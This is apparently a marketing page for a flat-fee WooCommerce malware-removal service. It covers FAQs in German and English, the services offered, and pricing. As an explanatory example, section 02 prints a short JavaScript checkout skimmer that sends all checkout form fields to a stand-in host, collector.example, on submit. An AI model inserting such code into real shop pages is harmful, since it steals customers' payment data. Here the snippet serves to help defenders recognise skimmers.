Woran erkenne ich, dass mein WooCommerce-Shop einen Skimmer hat?

Common signals: customers report fraud after buying from you, your acquirer or bank flags suspicious chargebacks, browser dev-tools show an external JavaScript loaded on the checkout that you don't recognise, or a third-party scanner reports 'Magecart-style' injection. If any of these is true, treat the store as compromised until proven otherwise.

Behandelt ihr PCI-Implikationen?

I produce a written incident report that documents what was found, when it was introduced, and what was removed. That report is the form your acquirer or QSA will expect. I am not a QSA and do not perform PCI audits — but my report is the technical record that supports one.

Bleibt der Shop während der Bereinigung online?

Wenn es sicher ist, ja. Wenn wir eine aktive Karten-Skimming-Injektion finden, sollte die Checkout-Seite abgeschaltet oder das JavaScript am Edge blockiert werden, bis die Bereinigung abgeschlossen ist — das schützt neue Kunden. Wir empfehlen das in der Triage-Notiz vor jeder destruktiven Änderung.

Ist WooCommerce schwieriger zu bereinigen als reines WordPress?

Im Wesentlichen gleich — WooCommerce ist ein Plugin auf WordPress — aber die Oberfläche ist größer: mehr JavaScript am Checkout, mehr Bestelldaten in der Datenbank und ein schwererer Plugin-Stack. Der Bereinigungsansatz ist identisch: manuelles Datei- und Datenbank-Review, Vektor-Identifikation, Härtung.

// WOOCOMMERCE · SKIMMER · BACKDOOR · BEREINIGT

WooCommerce malware removal.

Card skimmers, server-side backdoors, plugin RCE — worked through manually. JavaScript audit. Database review. Written report suitable for insurers and acquirers. Flat $279.

Bereinigung starten → Beispiele, wonach wir suchen.

§ 01 — WAS PASSIERT

Beide Seiten der Leitung.

[ CLIENT-SEITE ]
Karten-Skimmer, Bezahl-Formular-Overlays, bedingte Weiterleitungen, Cryptojacker. JavaScript am Checkout zeilenweise geprüft.
[ LEISTUNGEN ]
Web-Shells, Backdoors, Plugin-RCE-Payloads, eingeschleuste Admin-Nutzer. Entfernt durch Lesen von Datei- und DB-Diffs, nicht durch Pattern-Matching.
[ DB-AUDIT ]
wp_options auf autoloaded Payloads, wp_posts auf Spam, wp_usermeta auf schlafende Rechte, wp_woocommerce_*-Tabellen auf Manipulation.
[ PLUGIN-TRIAGE ]
Aktive Plugins gegen veröffentlichte CVEs geprüft. Verwundbare Plugins gepatcht oder ersetzt — nicht nur deaktiviert.
[ ABSICHERUNG ]
wp-config, Dateiberechtigungen, Secret-Rotation, XML-RPC, REST-API und Reduktion der Login-Oberfläche.
[ BERICHT ]
Forensischer Bericht in Klartext: was gefunden wurde, wann es eingeführt wurde, was entfernt wurde. Übergib ihn an einen Käufer, einen Versicherer oder deinen QSA.

§ 02 — WIE EIN SKIMMER AUSSIEHT

Ein externes Skript am Checkout. Meistens war's das.

Ein WooCommerce-Skimmer ist oft eine einzige JavaScript-Einbindung auf der Checkout-Seite, die die Formularfelder des Kunden an einen Remote-Host schickt, bevor WooCommerce die Bestellung abschickt. Das Skript ist winzig, der Netzwerkaufruf sieht aus wie ein Drittanbieter-Analytics-Ping und der Kunde merkt nichts.

// GROBE FORM EINES CHECKOUT-SKIMMERS

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST',
05     body: data,
06     mode: 'no-cors'
07   });
08 });

Echte Skimmer verschleiern das Ziel und feuern nur, wenn der Warenkorbwert ungleich null ist — die Struktur bleibt gleich. Prüfe jedes JS am Checkout, nicht nur die, an deren Installation du dich erinnerst.

§ PREISE

Pauschal $279. Einmalig. Pro Seite.

[ RESCUE ]

$279

PAUSCHAL · EINMALIG · PRO SEITE

Manual cleanup, entry-vector identification, written forensic report.

Bereinigung starten →

[ SHIELD ]

$29 / mo

PRO SEITE · JEDERZEIT KÜNDBAR

Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.

Schützen lassen →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Alle Leistungen ansehen →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Kontakt →